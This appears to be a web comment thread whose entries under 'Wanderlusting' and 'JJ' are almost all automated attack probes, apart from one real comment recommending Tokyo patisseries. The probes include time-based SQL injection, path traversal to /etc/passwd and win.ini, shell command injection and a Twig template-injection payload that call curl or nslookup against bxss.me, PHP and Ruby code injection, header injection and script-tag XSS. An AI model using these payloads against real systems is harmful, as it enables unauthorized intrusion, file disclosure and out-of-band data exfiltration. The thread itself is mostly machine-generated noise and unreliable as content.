re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@SFeT7
re: Wanderlusting
1CormpZAB6O
re: Wanderlusting
response.write(9338255*9046587)
re: Wanderlusting
'+response.write(9338255*9046587)+'
re: Wanderlusting
"+response.write(9338255*9046587)+"
re: Wanderlusting
%0abcc:074625.67-19860.67.14eb7.19990.2@bxss.me
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-19861.67.14eb7.19990.2@bxss.me
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
${9999991+10000061}
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
)
re: Wanderlusting
echo satdtr$()\ vpyhep\nz^xyu||a #' &echo satdtr$()\ vpyhep\nz^xyu||a #|" &echo satdtr$()\ vpyhep\nz^xyu||a #
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
'.gethostbyname(lc('hitif'.'zwliqjnx1bc95.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(88).chr(101).chr(87).'
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
&echo easvgd$()\ natkbf\nz^xyu||a #' &echo easvgd$()\ natkbf\nz^xyu||a #|" &echo easvgd$()\ natkbf\nz^xyu||a #
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
".gethostbyname(lc("hitwn"."ipclwtxe07216.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(65).chr(108).chr(83)."
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
|echo xvkavf$()\ aanolq\nz^xyu||a #' |echo xvkavf$()\ aanolq\nz^xyu||a #|" |echo xvkavf$()\ aanolq\nz^xyu||a #
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
(nslookup hitybspifmgtgc883e.bxss.me||perl -e "gethostbyname('hitybspifmgtgc883e.bxss.me')")
re: Wanderlusting
/etc/passwd
re: Wanderlusting
$(nslookup hitrxgnxkjpwbaf0e4.bxss.me||perl -e "gethostbyname('hitrxgnxkjpwbaf0e4.bxss.me')")
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
&nslookup hituqheczqvnoe6d91.bxss.me&'\"`0&nslookup hituqheczqvnoe6d91.bxss.me&`'
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
&(nslookup hitivfuzdluux40a80.bxss.me||perl -e "gethostbyname('hitivfuzdluux40a80.bxss.me')")&'\"`0&(nslookup hitivfuzdluux40a80.bxss.me||perl -e "gethostbyname('hitivfuzdluux40a80.bxss.me')")&`'
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
|(nslookup hitqhitjjckvqf070d.bxss.me||perl -e "gethostbyname('hitqhitjjckvqf070d.bxss.me')")
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(117).concat(84).concat(119).concat(75)+(require"socket"
Socket.gethostbyname("hitdb"+"ateuvqat2576c.bxss.me.")[3].to_s)+"
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
`(nslookup hitlbphyuvbrgc6b2d.bxss.me||perl -e "gethostbyname('hitlbphyuvbrgc6b2d.bxss.me')")`
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(103).concat(70).concat(107).concat(87)+(require'socket'
Socket.gethostbyname('hitkh'+'hlmcfjjn7c9bb.bxss.me.')[3].to_s)+'
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
;(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")|(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")&(nslookup hitpmyktnlgsc8351a.bxss.me||perl -e "gethostbyname('hitpmyktnlgsc8351a.bxss.me')")
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
/etc/shells
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
bxss.me
re: Wanderlusting
'"
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
<!--
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+579-579-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+579-579-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+142-142-1=0+0+0+1
re: Wanderlusting
-1 OR 3+142-142-1=0+0+0+1
re: Wanderlusting
-1' OR 2+89-89-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+89-89-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+825-825-1=0+0+0+1 or 'sbR1epoT'='
re: Wanderlusting
-1' OR 3+825-825-1=0+0+0+1 or 'sbR1epoT'='
re: Wanderlusting
-1" OR 2+723-723-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+723-723-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
jbK4uKSS'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 453=(SELECT 453 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: Wanderlusting
OPwp0wVB' OR 71=(SELECT 71 FROM PG_SLEEP(15))--
re: Wanderlusting
Bv8zBBsX') OR 430=(SELECT 430 FROM PG_SLEEP(15))--
re: Wanderlusting
mlNnLGpy')) OR 823=(SELECT 823 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@M4ypz
re: Wanderlusting
192NNQLXA0
re: Wanderlusting
response.write(9341349*9510157)
re: Wanderlusting
'+response.write(9341349*9510157)+'
re: Wanderlusting
"+response.write(9341349*9510157)+"
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
${9999428+10000499}
re: Wanderlusting
../
re: Wanderlusting
)
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
redirtest.acx
re: Wanderlusting
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Wanderlusting
echo ulhltx$()\ ovvrlk\nz^xyu||a #' &echo ulhltx$()\ ovvrlk\nz^xyu||a #|" &echo ulhltx$()\ ovvrlk\nz^xyu||a #
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Wanderlusting
&echo rrlybk$()\ iatgou\nz^xyu||a #' &echo rrlybk$()\ iatgou\nz^xyu||a #|" &echo rrlybk$()\ iatgou\nz^xyu||a #
re: Wanderlusting
'.gethostbyname(lc('hitgw'.'jccrelbnfb8a8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(78).chr(103).chr(70).'
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Wanderlusting
|echo xuurux$()\ eixvhh\nz^xyu||a #' |echo xuurux$()\ eixvhh\nz^xyu||a #|" |echo xuurux$()\ eixvhh\nz^xyu||a #
re: Wanderlusting
".gethostbyname(lc("hitwo"."hukrcdjq7f097.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(68).chr(120).chr(86)."
re: Wanderlusting
/etc/shells
re: Wanderlusting
expr 9000743810 - 939976
re: Wanderlusting
gethostbyname(lc('hitkw'.'qhfcexmb6091a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(68).chr(122).chr(68)
re: Wanderlusting
../../../../../../../../../../../../../../etc/shells
re: Wanderlusting
(nslookup -q=cname hitbsfexwwvtsd9217.bxss.me||curl hitbsfexwwvtsd9217.bxss.me))
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
$(nslookup -q=cname hitlpfqigvzjl5e8d4.bxss.me||curl hitlpfqigvzjl5e8d4.bxss.me)
re: Wanderlusting
bxss.me
re: Wanderlusting
&nslookup -q=cname hitpcgdaavzoxdfaad.bxss.me&'\"`0&nslookup -q=cname hitpcgdaavzoxdfaad.bxss.me&`'
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
&(nslookup -q=cname hitzanmbqzwulb1a91.bxss.me||curl hitzanmbqzwulb1a91.bxss.me)&'\"`0&(nslookup -q=cname hitzanmbqzwulb1a91.bxss.me||curl hitzanmbqzwulb1a91.bxss.me)&`'
re: Wanderlusting
http://bxss.me/t/fit.txt?.jpg
re: Wanderlusting
|(nslookup -q=cname hitruzkvdowsdb32f7.bxss.me||curl hitruzkvdowsdb32f7.bxss.me)
re: Wanderlusting
`(nslookup -q=cname hityvokjhbbuac3266.bxss.me||curl hityvokjhbbuac3266.bxss.me)`
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
;(nslookup -q=cname hithwheyjjwzd3a440.bxss.me||curl hithwheyjjwzd3a440.bxss.me)|(nslookup -q=cname hithwheyjjwzd3a440.bxss.me||curl hithwheyjjwzd3a440.bxss.me)&(nslookup -q=cname hithwheyjjwzd3a440.bxss.me||curl hithwheyjjwzd3a440.bxss.me)
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
|(nslookup${IFS}-q${IFS}cname${IFS}hitduvenktzas1c199.bxss.me||curl${IFS}hitduvenktzas1c199.bxss.me)
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
&(nslookup${IFS}-q${IFS}cname${IFS}hitnxkjpdjqgf051fd.bxss.me||curl${IFS}hitnxkjpdjqgf051fd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnxkjpdjqgf051fd.bxss.me||curl${IFS}hitnxkjpdjqgf051fd.bxss.me)&`'
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
'"()
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(105).concat(81).concat(119).concat(86)+(require"socket"
Socket.gethostbyname("hitmv"+"pwlyffjqbb2f1.bxss.me.")[3].to_s)+"
re: Wanderlusting
'&&sleep(27*1000)*aedtao&&'
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(108).concat(70)+(require'socket'
Socket.gethostbyname('hitpc'+'gjjnvkwxf66a9.bxss.me.')[3].to_s)+'
re: Wanderlusting
"&&sleep(27*1000)*xznacv&&"
re: Wanderlusting
'A'.concat(70-3).concat(22*4).concat(103).concat(75).concat(108).concat(74)+(require'socket'
Socket.gethostbyname('hitpg'+'oezvizoh64d71.bxss.me.')[3].to_s)
re: Wanderlusting
'||sleep(27*1000)*mbqrdg||'
re: Wanderlusting
"||sleep(27*1000)*lfccin||"
re: Wanderlusting
'"
re: Wanderlusting
replies
re: Wanderlusting
<!--
re: Wanderlusting
replies�
re: Wanderlusting
replies/.
re: Wanderlusting
'"()&%<zzz><ScRiPt >cn6e(9983)</ScRiPt>
re: Wanderlusting
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitpducfrrcli42eb5.bxss.me")}}
re: Wanderlusting
'"()&%<zzz><ScRiPt >cn6e(9283)</ScRiPt>
re: Wanderlusting
9139541
re: Wanderlusting
4HDkSeHZ
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
-1 OR 5*5=25 --
re: Wanderlusting
-1 OR 5*5=26 --
re: Wanderlusting
-1 OR 5*5=25
re: Wanderlusting
-1 OR 5*5=26
re: Wanderlusting
*if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
-1 waitfor delay '0:0:15' --
re: Wanderlusting
hprWQve3'; waitfor delay '0:0:15' --
re: Wanderlusting
-1 OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: Wanderlusting
-1) OR 612=(SELECT 612 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 135=(SELECT 135 FROM PG_SLEEP(15))--
re: Wanderlusting
UNS7vGlB' OR 904=(SELECT 904 FROM PG_SLEEP(15))--
re: Wanderlusting
K5cjCwik') OR 679=(SELECT 679 FROM PG_SLEEP(15))--
re: Wanderlusting
UHGs5zkv')) OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
'"
re: Wanderlusting
@@RH97a
re: Wanderlusting
(select 198766*667891)
re: Wanderlusting
(select 198766*667891 from DUAL)
I can second RIVA (the patisserie affiliated with LESS). Yuji Ajiki also makes a fantastic roll cake and fromage cru petit gateaux, but is located in the middle of nowhere :p.
Found A Tes Souhaits overrated, despite its high Tabelog score. Same goes for Asako Iwayanagi (the parfaits are nice but not ¥6000 nice).
re: JJ
gaBiS1iO
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+415-415-1=0+0+0+1
re: JJ
-1 OR 3+415-415-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
VgTu1UFM'; waitfor delay '0:0:15' --
re: JJ
-5 OR 360=(SELECT 360 FROM PG_SLEEP(15))--
re: JJ
-5) OR 219=(SELECT 219 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 669=(SELECT 669 FROM PG_SLEEP(15))--
re: JJ
ZUVYzPVo' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: JJ
akDsYJyk') OR 113=(SELECT 113 FROM PG_SLEEP(15))--
re: JJ
6OcVWlQ3')) OR 190=(SELECT 190 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@xYbZW
re: JJ
1C6ezZC38zO
re: JJ
response.write(9610901*9775212)
re: JJ
'+response.write(9610901*9775212)+'
re: JJ
"+response.write(9610901*9775212)+"
re: JJ
%0abcc:074625.67-19518.67.c3377.19990.2@bxss.me
re: JJ
to@example.com>%0d%0abcc:074625.67-19519.67.c3377.19990.2@bxss.me
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
